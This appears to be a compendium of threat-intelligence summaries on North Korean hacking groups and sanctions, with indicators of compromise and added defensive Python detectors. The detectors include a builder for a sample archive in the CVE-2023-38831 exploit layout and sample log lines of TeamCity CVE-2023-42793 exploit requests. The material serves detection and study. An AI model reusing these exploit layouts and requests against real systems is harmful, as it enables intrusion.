  • The second generation sanctions, however, cannot avoid impacting the non-elite civilian population as they have “indiscriminately targeted entire sectors of the North Korean economy, regardless of whether there was a proven direct link to the nuclear programme”, the report notes. It describes how the “UNSC particularly targeted the top North Korean export industries, progressively cutting off every profitable source of external revenue for the country and its people. Resolution 2321 (November 2016) targeted the mineral trade, one of the country’s most important sources of revenue [and one of its largest employers]. Resolution 2371 (August 2017) completely banned any export of minerals, as well as of seafood. Resolution 2375 (September 2017) banned exports of textiles, an industry in which the overwhelming majority of workers are women. Finally, Resolution 2397 (December 2017) targeted the remaining North Korean exports, including agricultural products, machinery, and electrical equipment.”
  • “There are serious questions about the efficacy of the current United Nations sanctions regime”, a leaked report from the UN panel of experts has concluded. UN sanctions imposed on the DPRK over the past decade have failed to prevent Pyongyang from scaling up its nuclear and ballistic missile programmes.
  • Andray Abrahamian in his March 2016 38 North article describes how North Koreans have learnt to navigate the many restrictions imposed on them during the last ten years. For example, they regularly skirt around financial restrictions by using informal money transfers to banks in China; that is, cash from Pyongyang crosses the border via intermediaries and turns up in a Chinese bank account with no formal record of origin. He points out that the more aggressive financial sanctions imposed by UNSCR 2270 and subsequent UNSC resolutions will only succeed against these sorts of evasive tactics developed by the DPRK if its neighbours—as well as traders, bankers and regimes around the world—are willing to cooperate. Indicators::

Scarcruft Detecting Ongoing STARK#MULE Attack Campaign Targeting Victims Using US Military Document Lures

Date:: 2023-07-28 URL:: https://securonix.com/blog/detecting-ongoing-starkmule-attack-campaign-targeting-victims-using-us-military-document-lures/ Tags:: Details::

  • ScarCruft lured victims with U.S. military-themed documents that ran malware staged on compromised, otherwise legitimate Republic of Korea websites
  • The goal seems to have been to spark the recipient’s curiosity enough to have them open the attached documents and inadvertently execute the contained malware Indicators::

Spreading malware disguised as coin and investment-related content

Date:: 2023-07-31 URL:: https://asec.ahnlab.com/ko/55646/ Tags:: Kimsuky Details:: Indicators::

VMConnect Malicious PyPI packages imitate popular open source modules

Date:: 2023-08-03 URL:: https://reversinglabs.com/blog/vmconnect-malicious-pypi-packages-imitate-popular-open-source-modules Tags:: Details::

  • New malicious PyPI campaign that includes a suspicious VMConnect package published to the PyPI repo.
  • Decoding the string revealed a download URL that is modified with information collected from the host machine
  • The substring paperpin3902 in the command-and-control URL is replaced with a string built from the first letter of the host’s platform name, the username, and a random 6-character string Indicators::
  • 45.61.139[.]219
  • ethertestnet[.]pro
  • deliworkshopexpress[.]xyz

The CoinsPaid Hack Explained: We Know Exactly How Attackers Stole and Laundered $37M USD

Date:: 2023-08-07 URL:: https://coinspaid.com/company-updates/the-coinspaid-hack-explained/ Tags:: TraderTraitor, Money Laundering Details::

  • Based on our internal investigation, we have reasons to suspect that the top-tier hacker group Lazarus may be behind the attack on CoinsPaid. The hackers employed the same tactics and money laundering schemes that Lazarus had used in the recent Atomic Wallet heist.
  • One of our employees responded to a job offer from Crypto.com.
  • While participating in the interview, they received a test assignment that required the installation of an application with malicious code.
  • After opening the test task, profiles and keys were stolen from the computer to establish a connection with the company’s infrastructure.
  • Having gained access to the CoinsPaid infrastructure, the attackers took advantage of a vulnerability in the cluster and opened a backdoor.
  • The knowledge perpetrators gained at the exploration stage enabled them to reproduce legitimate requests for interaction interfaces with the blockchain and withdraw the company’s funds from our operational storage vault. Indicators::

FBI Identifies Cryptocurrency Funds Stolen by DPRK

Date:: 2023-08-22 URL:: https://fbi.gov/news/press-releases/fbi-identifies-cryptocurrency-funds-stolen-by-dprk Tags:: Money Laundering Details:: Indicators::

  • 3LU8wRu4ZnXP4UM8Yo6kkTiGHM9BubgyiG
  • 39idqitN9tYNmq3wYanwg3MitFB5TZCjWu
  • 3AAUBbKJorvNhEUFhKnep9YTwmZECxE4Nk
  • 3PjNaSeP8GzLjGeu51JR19Q2Lu8W2Te9oc
  • 3NbdrezMzAVVfXv5MTQJn4hWqKhYCTCJoB
  • 34VXKa5upLWVYMXmgid6bFM4BaQXHxSUoL

Mandiant: APT38 Un-usual Suspects

Date:: 2023-08-23 URL:: https://cloud.google.com/blog/topics/threat-intelligence/apt38-details-on-new-north-korean-regime-backed-threat-group Tags:: APT38 Details::

  • Note: the APT38 report was originally published by FireEye in October 2018; the Google Cloud URL is the republished copy.
  • We believe APT38’s financial motivation, unique toolset, and tactics, techniques and procedures (TTPs) observed during their carefully executed operations are distinct enough to be tracked separately from other North Korean cyber activity. There are many overlapping characteristics with other operations, known as “Lazarus” and the actor we call TEMP.Hermit; however, we believe separating this group will provide defenders with a more focused understanding of the adversary and allow them to prioritize resources and enable defense. The following are some of the ways APT38 is different from other North Korean actors, and some of the ways they are similar:
  • We find there are clear distinctions between APT38 activity and the activity of other North Korean actors, including the actor we call TEMP.Hermit. Our investigation indicates they are disparate operations against different targets and reliance on distinct TTPs; however, the malware tools being used either overlap or exhibit shared characteristics, indicating a shared developer or access to the same code repositories. As evident in the DOJ complaint, there are other shared resources, such as personnel who may be assisting multiple efforts. Indicators::

VMConnect supply chain attack continues, evidence points to North Korea

Date:: 2023-08-23 URL:: https://reversinglabs.com/blog/vmconnect-supply-chain-campaign-continues Tags:: JokerSpy Details::

  • In early August, ReversingLabs identified a malicious supply chain campaign that the research team dubbed “VMConnect.” That campaign consisted of two dozen malicious Python packages posted to the Python Package Index (PyPI) open-source repository. The packages mimicked popular open-source Python tools, including vConnector, a wrapper module for pyVmomi VMware vSphere bindings; eth-tester, a collection of tools for testing Ethereum-based applications; and databases, a tool that gives asynchronous support for a range of databases.
  • The research team has continued monitoring PyPI and now has identified three more malicious Python packages that are believed to be a continuation of the VMConnect campaign: tablediter, request-plus, and requestspro. As happened with the ReversingLabs team's earlier VMConnect research, the team was unable to obtain copies of the Stage 2 malware used in this campaign. However, an analysis of the malicious packages used and their decrypted payloads reveals links to previous campaigns attributed to Labyrinth Chollima, an offshoot of Lazarus Group, a North Korean state-sponsored threat group. Indicators::

US arrests Tornado Cash co-founder, sanctions another who remains at large

Date:: 2023-08-23 URL:: https://therecord.media/us-arrests-tornado-cash-cofounder https://justice.gov/usao-sdny/pr/tornado-cash-founders-charged-money-laundering-and-sanctions-violations https://home.treasury.gov/news/press-releases/jy1702 Tags:: Money Laundering Details:: Indicators::

Lazarus Group's infrastructure reuse leads to discovery of new malware

Date:: 2023-08-24 URL:: https://blog.talosintelligence.com/lazarus-collectionrat/ https://blog.talosintelligence.com/lazarus-quiterat/ Tags:: Details::

  • Another example of the actor reusing the same infrastructure. We discovered that QuiteRAT and the open-source DeimosC2 agents used in this campaign were hosted on the same remote locations used by the Lazarus Group in their preceding campaign from 2022 that deployed MagicRAT. This infrastructure was also used for commanding and controlling CollectionRAT, the newest malware in the actor’s arsenal. A malicious copy of PuTTY’s Plink utility (a reverse-tunneling tool) was also hosted on the same infrastructure serving CollectionRAT to compromised endpoints. Lazarus has been known to use dual-use utilities in their operations, especially for reverse tunneling such as Plink and 3proxy.
  • Some CollectionRAT malware from 2021 was signed with the same code-signing certificate as Jupiter/EarlyRAT (also from 2021), a malware family listed in CISA’s advisory detailing recent North Korean ransomware activity. Indicators::

Active North Korean campaign targeting security researchers

Date:: 2023-09-07 URL:: https://blog.google/threat-analysis-group/active-north-korean-campaign-targeting-security-researchers/ Tags:: Details::

  • In January 2021, a DPRK cyber actor campaign was publicly disclosed, in which they used 0-day exploits to target security researchers working on vulnerability research and development.
  • Over the past two and a half years, the campaign has continued.
  • Recently, DPRK cyber actors were found to likely be responsible for a new, similar campaign, with at least one actively exploited 0-day being used to target security researchers in the past several weeks.
  • DPRK threat actors used social media sites like X (formerly Twitter) to build rapport with their targets.
  • After initial contact via X, they moved to an encrypted messaging app such as Signal, WhatsApp or Wire.
  • Once a relationship was developed with a targeted researcher, the threat actors sent a malicious file that contained at least one 0-day in a popular software package.
  • Upon successful exploitation, the shellcode conducts a series of anti-virtual machine checks and then sends the collected information, along with a screenshot, back to an attacker-controlled command and control domain.
  • The shellcode used in this exploit is constructed in a similar manner to shellcode observed in previous North Korean exploits. Indicators::

Scarcruft exploits WinRAR vulnerability (CVE-2023-38831) targeting the cryptocurrency industry

Date:: 2023-09-18 URL:: https://paper.seebug.org/3033/ Tags:: CVE Details::

  • This recent wave of attacks is noteworthy for revealing that, apart from the Lazarus Group, there are other North Korean-affiliated entities engaging in targeted operations against the cryptocurrency industry, which is relatively uncommon in the security community.
  • The targets of this Konni group's recent attacks are notably different from their previous activities. Judging by the lure name, the attacks are directed towards the cryptocurrency industry
  • It is speculated that Konni may be exploring new attack vectors.
  • The captured sample is named wallet_Screenshot_2023_09_06_Qbao_Network.zip and references Qbao Network, which is described as follows: Indicators::
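The archive layout that CVE-2023-38831 depends on is not spelled out above. WinRAR before 6.23 would, when a user opened a benign-looking file from an archive, also extract a directory whose name matched the file (differing only by a trailing space) and end up running the similarly named script inside it instead of the decoy. The Python below is an added check, not part of the Seebug write-up and not the real contents of the Qbao_Network.zip sample: it parses a ZIP's central directory and reports file/directory name collisions that survive trailing-space trimming when the directory holds something executable. Entry names in the constructed sample archive are made up.

```python
import io
import zipfile
from typing import Dict, List

# Extensions Windows will execute if WinRAR hands them to ShellExecute.
EXEC_EXTS = (".cmd", ".bat", ".exe", ".com", ".vbs", ".js", ".wsf", ".ps1", ".scr", ".lnk")


def _norm(name: str) -> str:
    # Windows drops trailing spaces from names, which is what lets
    # "decoy.pdf " and "decoy.pdf" collide; compare the same way.
    return name.rstrip("/").rstrip(" ").lower()


def find_cve_2023_38831(zip_bytes: bytes) -> List[Dict[str, str]]:
    """Flag file/directory pairs whose names collide after trailing-space
    trimming, when the directory holds a directly executable child."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()

    files = [n for n in names if not n.endswith("/")]
    dirs = {n[:-1] for n in names if n.endswith("/")}
    for f in files:                      # directories implied by file paths
        parent = f.rpartition("/")[0]
        while parent:
            dirs.add(parent)
            parent = parent.rpartition("/")[0]

    by_key = {}                          # (parent, normalised base) -> decoy file
    for f in files:
        parent, _, base = f.rpartition("/")
        by_key.setdefault((parent, _norm(base)), f)

    findings = []
    for d in sorted(dirs):
        parent, _, base = d.rpartition("/")
        decoy = by_key.get((parent, _norm(base)))
        if decoy is None:
            continue
        for f in files:
            inside = f.startswith(d + "/") and "/" not in f[len(d) + 1:]
            if inside and f.lower().rstrip(" ").endswith(EXEC_EXTS):
                findings.append({"decoy": decoy, "directory": d + "/", "payload": f})
    return findings


def build_sample_archive() -> bytes:
    """Constructed sample mirroring the documented layout (names are invented)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Qbao_Network.pdf ", b"%PDF-1.4 decoy")
        zf.writestr("Qbao_Network.pdf /Qbao_Network.pdf .cmd", b"@echo off\r\nstart calc\r\n")
    return buf.getvalue()


def build_benign_archive() -> bytes:
    """Constructed control: a script in a directory that does not collide with a decoy."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4")
        zf.writestr("scripts/setup.cmd", b"@echo off")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in find_cve_2023_38831(build_sample_archive()):
        print("CVE-2023-38831 layout:", hit)
```

The check is deliberately structural rather than extension-driven on the decoy side: the lure can be a PDF, JPG or anything else, and the only invariant is the colliding directory. It reads the ZIP container only; RAR archives carrying the same layout need a RAR parser.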

Lazarus luring employees with trojanized coding challenges: The case of a Spanish aerospace company

Date:: 2023-09-29 URL:: https://welivesecurity.com/en/eset-research/lazarus-luring-employees-trojanized-coding-challenges-case-spanish-aerospace-company/ Tags:: Details::

  • Lazarus delivered various payloads to the victims’ systems; the most notable is a publicly undocumented and sophisticated remote access trojan (RAT) that we named LightlessCan, which represents a significant advancement compared to its predecessor, BlindingCan. LightlessCan mimics the functionalities of a wide range of native Windows commands, enabling discreet execution within the RAT itself instead of noisy console executions. This strategic shift enhances stealthiness, making detecting and analyzing the attacker’s activities more challenging. Indicators::

Assessed Cyber Structure and Alignments of North Korea in 2023

Date:: 2023-10-10 URL:: https://cloud.google.com/blog/topics/threat-intelligence/north-korea-cyber-structure-alignment-2023 Tags:: Details::

  • The DPRK’s offensive program continues to evolve, showing that the regime is determined to continue using cyber intrusions to conduct both espionage and financial crime to project power and to finance both their cyber and kinetic capabilities.
  • Latest DPRK nexus operations hint at an increase in adaptability and complexity, including a cascading software supply chain attack seen for the first time, and consistently targeting blockchain and fintech verticals.
  • While different threat groups share tooling and code, North Korean threat activity continues to adapt and change to build tailored malware for different platforms, including Linux and macOS.
  • Mandiant’s continuous monitoring of DPRK aligned malicious cyber actors highlights a significant multiyear shift and blend in the country’s cyber posture.
  • Overlaps in targeting and shared tooling muddles attribution attempts for investigators while streamlining adversarial activities.
  • Historical examples of activity and uncategorized clustering represent a way forward for maintaining visibility on separate groups. Indicators::

Lazarus Group’s Undercover Operations 2022–2023 L. Taewoo, S. Lee & D. Kim

Date:: 2023-10-13 URL:: https://youtube.com/watch?v=B5hYzdCSQ2E Tags:: Details::

  • The presentation covers Lazarus Group’s cyberattacks targeting South Korea between 2022 and 2023. It focuses on their large-scale infection campaigns exploiting vulnerabilities in financial security software and watering hole techniques.
  • Target Sectors: Lazarus Group targeted South Korean financial institutions, media companies, software developers, and cryptocurrency exchanges.
  • Attack Techniques: The group leveraged zero-day vulnerabilities in widely used financial security software and watering hole attacks by compromising popular websites.
  • Infiltration: Lazarus hacked into high-traffic websites and set up watering hole pages -> Victims accessing these pages unknowingly downloaded malware due to vulnerabilities in financial security software.
  • Lateral Movement: After initial access, the group spread malware internally by exploiting SMB services, scanning networks, and leveraging additional vulnerabilities.
  • Exfiltration: Key servers were compromised to steal sensitive data -> used as hubs for further information leakage.
  • Case Study: Operation Gold Goblin
  • Lazarus exploited vulnerabilities in financial security software to launch targeted attacks.
  • The attackers analyzed stolen source code to develop exploit tools for future attacks.
  • The campaign affected ~10 million devices in South Korea, highlighting systemic risks in mandatory banking software.
  • Malware Analysis: Four types of malware were identified, including Rocket Downloader (used for initial access) and others designed for persistence, data exfiltration, and remote control.
  • Command & Control (C&C): Lazarus set up internal web-based C&C servers within compromised networks to maintain control over infected systems.
  • Techniques Used: DLL side-loading, Directory traversal vulnerabilities, Buffer overflow exploits, Privilege escalation via “PrintNightmare” vulnerabilities
  • The presentation links Gold Goblin to previous Lazarus operations like “Operation Bookcode” (2020) and “Dream Job” (2018).
  • Evidence suggests Lazarus reused stolen source code and evolved their techniques over time.
  • Challenges Highlighted: Delayed patching of financial security software by banks left users vulnerable, attackers exploited systemic reliance on outdated mandatory banking tools in South Korea, the interconnected nature of media companies amplified the spread of infections.
  • The Lazarus Group’s campaigns demonstrate advanced tactics, persistence, and adaptability. Their attacks on critical sectors in South Korea reveal systemic cybersecurity weaknesses. The presentation emphasizes the need for proactive threat intelligence, faster patch deployment, and improved cybersecurity practices to mitigate such threats. Indicators::

How North Korean Workers Tricked U.S. Companies into Hiring Them and Secretly Funneled Their Earnings into Weapons Programs

Date:: 2023-10-19 URL:: https://zetter-zeroday.com/p/how-north-korean-workers-tricked https://apnews.com/article/north-korea-weapons-program-it-workers-f3df7c120522b0581db5c0b9682ebc9b https://justice.gov/opa/pr/justice-department-announces-court-authorized-action-disrupt-illicit-revenue-generation Tags:: DPRK-IT Details:: Indicators::

TeamCity CVE-2023-42793 / CyberLink Supply Chain Attack

Date:: 2023-10-20 URL:: https://microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/ https://bleepingcomputer.com/news/security/microsoft-lazarus-hackers-breach-cyberlink-in-supply-chain-attack/ https://microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/ Tags:: CVE Details::

  • Since early October 2023, Microsoft has observed two North Korean nation-state threat actors, Diamond Sleet and Onyx Sleet, exploiting CVE-2023-42793, a remote-code execution vulnerability affecting multiple versions of JetBrains TeamCity server
  • TeamCity is a continuous integration/continuous deployment (CI/CD) application used by organizations for DevOps and other software development activities. Indicators::
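Microsoft's post does not show what exploitation of CVE-2023-42793 looks like on the wire. As an added example (not Microsoft's or JetBrains' code), the Python below scans reverse-proxy access log lines for the publicly documented chain: TeamCity exempted any path ending in /RPC2 from authentication, so an unauthenticated POST to /app/rest/users/id:1/tokens/RPC2 minted a token for the admin user, and with that token the /app/rest/debug/processes endpoint could launch a process. The log lines, IPs and timestamps are constructed, and the combined log format (nginx or Apache in front of TeamCity) is an assumption; TeamCity's own Tomcat access log has a different layout.

```python
import re
from typing import Dict, Iterable, List

# Combined log format as written by nginx/Apache in front of TeamCity (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def classify_request(method: str, path: str) -> str:
    """Return a finding label for one request, or '' if it is unremarkable."""
    route = path.split("?", 1)[0]
    if route.startswith("/app/rest/") and route.rstrip("/").endswith("/RPC2"):
        # The bypass: routes ending in /RPC2 were exempt from authentication, so
        # the REST API could be reached unauthenticated by appending the suffix.
        if "/tokens/" in route:
            return "CVE-2023-42793: unauthenticated token creation"
        return "CVE-2023-42793: /RPC2 suffix on REST route"
    if method == "POST" and route.startswith("/app/rest/debug/processes"):
        return "post-exploitation: debug process launch"
    return ""


def scan_access_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        label = classify_request(m["method"], m["path"])
        if label:
            findings.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                             "path": m["path"], "status": m["status"], "finding": label})
    return findings


# Constructed sample: two attacker requests, one legitimate REST call and one
# legitimate agent call to the real /RPC2 XML-RPC endpoint, which must not fire.
SAMPLE_LOG = [
    '203.0.113.7 - - [09/Oct/2023:08:13:21 +0000] "POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1" 200 312 "-" "python-requests/2.31.0"',
    '203.0.113.7 - - [09/Oct/2023:08:13:25 +0000] "POST /app/rest/debug/processes?exePath=cmd.exe&params=/c+whoami HTTP/1.1" 200 58 "-" "python-requests/2.31.0"',
    '198.51.100.2 - - [09/Oct/2023:08:20:00 +0000] "GET /app/rest/builds?locator=running:true HTTP/1.1" 200 4096 "-" "curl/8.1.2"',
    '198.51.100.9 - - [09/Oct/2023:08:21:10 +0000] "POST /RPC2 HTTP/1.1" 200 210 "-" "TeamCity-Agent"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["path"], "->", hit["finding"])
```

A 200 on the token route is the strongest signal; a 401 or 404 on the same path still shows someone probing a patched server and is worth keeping as a lower-severity hit.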

Lazarus’ New Campaign Exploiting Legitimate Software

Date:: 2023-10-26 URL:: https://kaspersky.com/about/press-releases/2023_a-cascade-of-compromise-kaspersky-exposes-lazarus-new-campaign-exploiting-legitimate-software Tags:: Details::

  • The adversary exhibited a high level of sophistication, employing advanced evasion techniques and deploying a SIGNBT malware to control the victim. They also applied the already well-known LPEClient tool, previously seen targeting defense contractors, nuclear engineers and the cryptocurrency sector. This malware acts as the initial point of infection and plays a crucial role in profiling the victim and delivering the payload. Kaspersky researchers' observations indicate that LPEClient's role in this and other attacks aligns with the tactics employed by the Lazarus group, as also seen in the notorious 3CX supply chain attack. Indicators::

Deep Dive into the Lazarus Group's Foray into macOS

Date:: 2023-10-29 URL:: https://slideshare.net/MITREATTACK/exploring-the-labyrinth-deep-dive-into-the-lazarus-groups-foray-into-macos Tags:: Details::

  • This talk will deep dive into the interactive macOS intrusions CrowdStrike has attributed to LABYRINTH CHOLLIMA.
  • We will delve into the adversary's macOS tradecraft, techniques to circumvent existing OS protections, and social engineering tactics, while showcasing how their mechanisms and tooling map to the MITRE ATT&CK kill chain, featuring some newly proposed MITRE techniques related to the Transparency, Consent, and Control (TCC) database. Indicators::

FastViewer Variant Merged with FastSpy and disguised as a Legitimate Mobile Application

Date:: 2023-10-30 URL:: https://medium.com/s2wblog/fastviewer-variant-merged-with-fastspy-and-disguised-as-a-legitimate-mobile-application-f3004588f95c Tags:: Kimsuky Details::

  • Kimsuky has created a FastViewer variant that induces a victim to install the app onto their mobile device by disguising the malware as a legitimate Android application (APK file), such as Google Authenticator, an anti-virus program, or a payment service application. The FastViewer malware receives commands directly from the server without downloading additional malware, and the main purpose of this FastViewer variant is to steal information from infected devices. It appears that Kimsuky has developed this malware since at least July 2023 to target Republic of Korea victims. The report further notes that the disguised applications are expected to be distributed via spearphishing emails or smishing to trick targets into running them. Indicators::

Lazarus Targets Blockchain Engineers With New KandyKorn macOS Malware

Date:: 2023-10-31 URL:: https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn Tags:: Kandykorn, Bluenoroff, TA444, JokerSpy, RustBucket Details::

  • We discovered this intrusion when analyzing attempts to reflectively load a binary into memory on a macOS endpoint. The intrusion was traced to a Python application posing as a cryptocurrency arbitrage bot delivered via a direct message on a public Discord server.
  • Stage 0 (Initial Compromise) - Watcher.py
  • Stage 1 (Dropper) - testSpeed.py and FinderTools
  • Stage 2 (Payload) - .sld and .log - SUGARLOADER
  • Stage 3 (Loader)- Discord (fake) - HLOADER
  • Stage 4 (Payload) - KANDYKORN
  • The initial breach was orchestrated via a camouflaged Python application designed and advertised as an arbitrage bot targeted at blockchain engineers. This application was distributed as a .zip file titled Cross-Platform Bridges.zip. Decompressing it reveals a Main.py script accompanied by a folder named order_book_recorder, housing 13 Python scripts.
  • After download, testSpeed.py launches FinderTools, providing a URL (tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC) as an argument which initiates an outbound network connection.
  • HLOADER was identified through the use of a macOS binary code-signing technique that has been previously linked to the DPRK’s Lazarus Group 3CX intrusion. In addition to other published research, Elastic Security Labs has also used the presence of this technique as an indicator of DPRK campaigns, as seen in our June 2023 research publication on JOKERSPY.
  • While LinkPC is a legitimate second-level domain and dynamic DNS service provider, it is well-documented that this specific service is used by threat actors for C2. In our published research into RUSTBUCKET, which is also attributed to the DPRK, we observed LinkPC being used for C2.
  • The user on Reddit reported that a recruiter contacted them to solve a Python coding challenge as part of a job offer. The code challenge was to analyze Python code purported to be for an internet speed test. This aligns with the REF7001 victim’s reporting on being offered a Python coding challenge and the script name testSpeed.py detailed earlier in this research.
  • The domain reported on Reddit was group.pro-tokyo[.]top//OcRLY4xsFlN/vMZrXIWONw/6OyCZl89HS/fP7savDX6c/bfC which follows the same structure as the REF7001 URL (tp-globa[.]xyz//OdhLca1mLUp/lZ5rZPxWsh/7yZKYQI43S/fP7savDX6c/bfC): Indicators::
  • 23.254.226[.]90
  • tp-globa[.]xyz
  • 192.119.64[.]43

Operation Covert Stalker

Date:: 2023-11-01 URL:: https://asec.ahnlab.com/ko/58231/ Tags:: Kimsuky Details::

  • North Korea sends hacking emails disguised as normal URLs, or carrying malicious attachments, to specific individuals and organizations engaged in politics, diplomacy, and security
  • Windows systems are compromised by exploiting the RDP vulnerability CVE-2019-0708 (BlueKeep); vulnerable websites are compromised through as-yet-unidentified vulnerabilities
  • To keep persistent access, the operators create accounts for RDP logon and additionally install remote-management software such as RDP Wrapper, Quasar RAT, Ammyy Admin, AnyDesk, and TeamViewer
  • From the compromised hosts they perform a range of malicious activities: searching for new targets, sending hacking emails, scanning for the RDP vulnerability (CVE-2019-0708), and testing malware
  • They infect victims with BlackBit ransomware and demand payment for recovery
  • C2 is built, managed, and operated through web shells (Green Dinosaur, WebadminPHP, unidentified ones, etc.)
  • Some malware contains North Korean vocabulary such as “연동”, “봉사기” (the North Korean word for “server”), and “대면부” Indicators::

King of Thieves Black Alicanto and the Ecosystem of North Korea Based Cyber Operations

Date:: 2023-11-01 URL:: https://sansorg.egnyte.com/dl/3P3HxFiNgL Tags:: BlueNoroff, DangerousPassword, TA444 Details::

  • Sapphire Sleet (COPERNICIUM), APT38, Bluenoroff, TA444, DangerousPassword, CryptoCore, CryptoMimic, Stardust Chollima
  • Social engineering mainly via email or social media (LinkedIn, Discord)
  • Lure themes: US regulatory action, Risks of stablecoins, Pitch Deck, Investment agreements, Presentations (Protected), Salary Adjustments
  • DangerousPassword was known for Password.txt.lnk
  • 2023 is the year of SecurePDF (or PDFReader, PDFViewer) Indicators::
  • cryptowave[.]capital
  • daiwa[.]ventures

Crypto-Themed npm Packages Found Delivering Stealthy Malware

Date:: 2023-11-04 URL:: https://blog.phylum.io/crypto-themed-npm-packages-found-delivering-stealthy-malware/ Tags:: Details::

BlueNoroff strikes again with new macOS malware

Date:: 2023-11-06 URL:: https://jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/ Tags:: BlueNoroff Details::

  • Jamf Threat Labs has identified a new malware variant attributed to the BlueNoroff APT group. BlueNoroff’s campaigns are financially motivated, frequently targeting cryptocurrency exchanges, venture capital firms and banks.
  • During our routine threat hunting, we discovered a Mach-O universal binary communicating with a domain that Jamf has previously classified as malicious. Indicators::
  • swissborg[.]blog

Microsoft Threat Intelligence: Sapphire Sleet

Date:: 2023-11-08 URL:: https://x.com/MsftSecIntel/status/1722316021841764414 Tags:: BlueNoroff Details::

  • Sapphire Sleet, which overlaps with threat actors tracked by other researchers as BlueNoroff, CageyChameleon, and CryptoCore, is a nation-state sponsored threat actor based in North Korea and has targeted organizations in the cryptocurrency sector. Indicators::

BlueNoroff hackers plan new crypto-theft attacks

Date:: 2023-11-10 URL:: https://bleepingcomputer.com/news/security/microsoft-bluenoroff-hackers-plan-new-crypto-theft-attacks/ https://x.com/MsftSecIntel/status/1722316019920728437 Tags:: BlueNoroff Details::

  • Microsoft warns that the BlueNoroff North Korean hacking group is setting up new attack infrastructure for upcoming social engineering campaigns on LinkedIn. Indicators::

Two South Koreans indicted for allegedly colluding with North Korean hackers

Date:: 2023-11-21 URL:: https://nknews.org/2023/11/two-south-koreans-indicted-for-allegedly-colluding-with-north-korean-hackers/ https://spo.go.kr/site/spo/ex/board/View.do?cbIdx=1403&bcIdx=1043403 Tags:: Details:: Indicators::

Reuters: North Koreans use fake names, scripts to land remote IT work for cash

Date:: 2023-11-21 URL:: https://reuters.com/technology/north-koreans-use-fake-names-scripts-land-remote-it-work-cash-2023-11-21/ Tags:: DPRK-IT Details:: Indicators::

Palo Alto Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North Korean Threat Actors

Date:: 2023-11-21 URL:: https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/ Tags:: DPRK-IT, DPRK-CI Details::

  • Contagious Interview as CL-STA-0240
  • Wagemole as CL-STA-0241 Indicators::

Diamond Sleet supply chain compromise distributes a modified CyberLink installer

Date:: 2023-11-22 URL:: https://microsoft.com/en-us/security/blog/2023/11/22/diamond-sleet-supply-chain-compromise-distributes-a-modified-cyberlink-installer/ Tags:: Details::

  • Microsoft has observed suspicious activity associated with the modified CyberLink installer file as early as October 20, 2023. The malicious file has been seen on over 100 devices in multiple countries, including Japan, Taiwan, Canada, and the United States. While Microsoft has not yet identified hands-on-keyboard activity carried out after compromise via this malware, the group has historically:
  • If these criteria are not met, the executable continues running the CyberLink software and abandons further execution of malicious code. Otherwise, the software attempts to contact one of three URLs to download the second-stage payload embedded inside a file masquerading as a PNG file using the static User-Agent ‘Microsoft Internet Explorer’
  • When invoked, the in-memory executable attempts to contact the following callbacks for further instruction. Both domains are legitimate but have been compromised by Diamond Sleet. Indicators::
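Two observables in Microsoft's description lend themselves to a concrete check: the static User-Agent string and the second stage hidden in a file presented as a PNG. The Python below is added here and is not Microsoft's or CyberLink's code. It walks the PNG chunk structure and reports anything a real encoder would not produce (bytes after IEND, a bad CRC, a missing IHDR), and flags a download whose User-Agent is the literal string from the write-up. The sample PNG and download are constructed; which anomaly the real file exhibited is not stated on the page, so the validator is generic.

```python
import struct
import zlib
from typing import List

PNG_SIG = b"\x89PNG\r\n\x1a\n"
STATIC_UA = "Microsoft Internet Explorer"   # literal User-Agent named in the write-up


def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def build_png(width: int = 1, height: int = 1) -> bytes:
    """Constructed minimal 8-bit greyscale PNG used as the clean sample."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 0, 0, 0, 0)
    raw = b"".join(b"\x00" + b"\x00" * width for _ in range(height))  # filter byte + pixels
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")


def png_anomalies(data: bytes) -> List[str]:
    """Walk the chunk list; anything a real encoder would never emit is reported."""
    if not data.startswith(PNG_SIG):
        return ["no PNG signature"]
    problems: List[str] = []
    pos, first, ended = len(PNG_SIG), True, False
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc_bytes = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or len(crc_bytes) != 4:
            problems.append("truncated chunk %r" % ctype)
            return problems
        if (zlib.crc32(ctype + body) & 0xFFFFFFFF) != struct.unpack(">I", crc_bytes)[0]:
            problems.append("bad CRC in %r" % ctype)
        if first and ctype != b"IHDR":
            problems.append("first chunk is not IHDR")
        first = False
        pos += 12 + length
        if ctype == b"IEND":
            ended = True
            break
    if not ended:
        problems.append("no IEND chunk")
    elif pos < len(data):
        # A loader that appends its payload after IEND leaves the image viewable
        # but the trailing bytes are exactly what a stager would read out.
        problems.append("%d bytes after IEND" % (len(data) - pos))
    return problems


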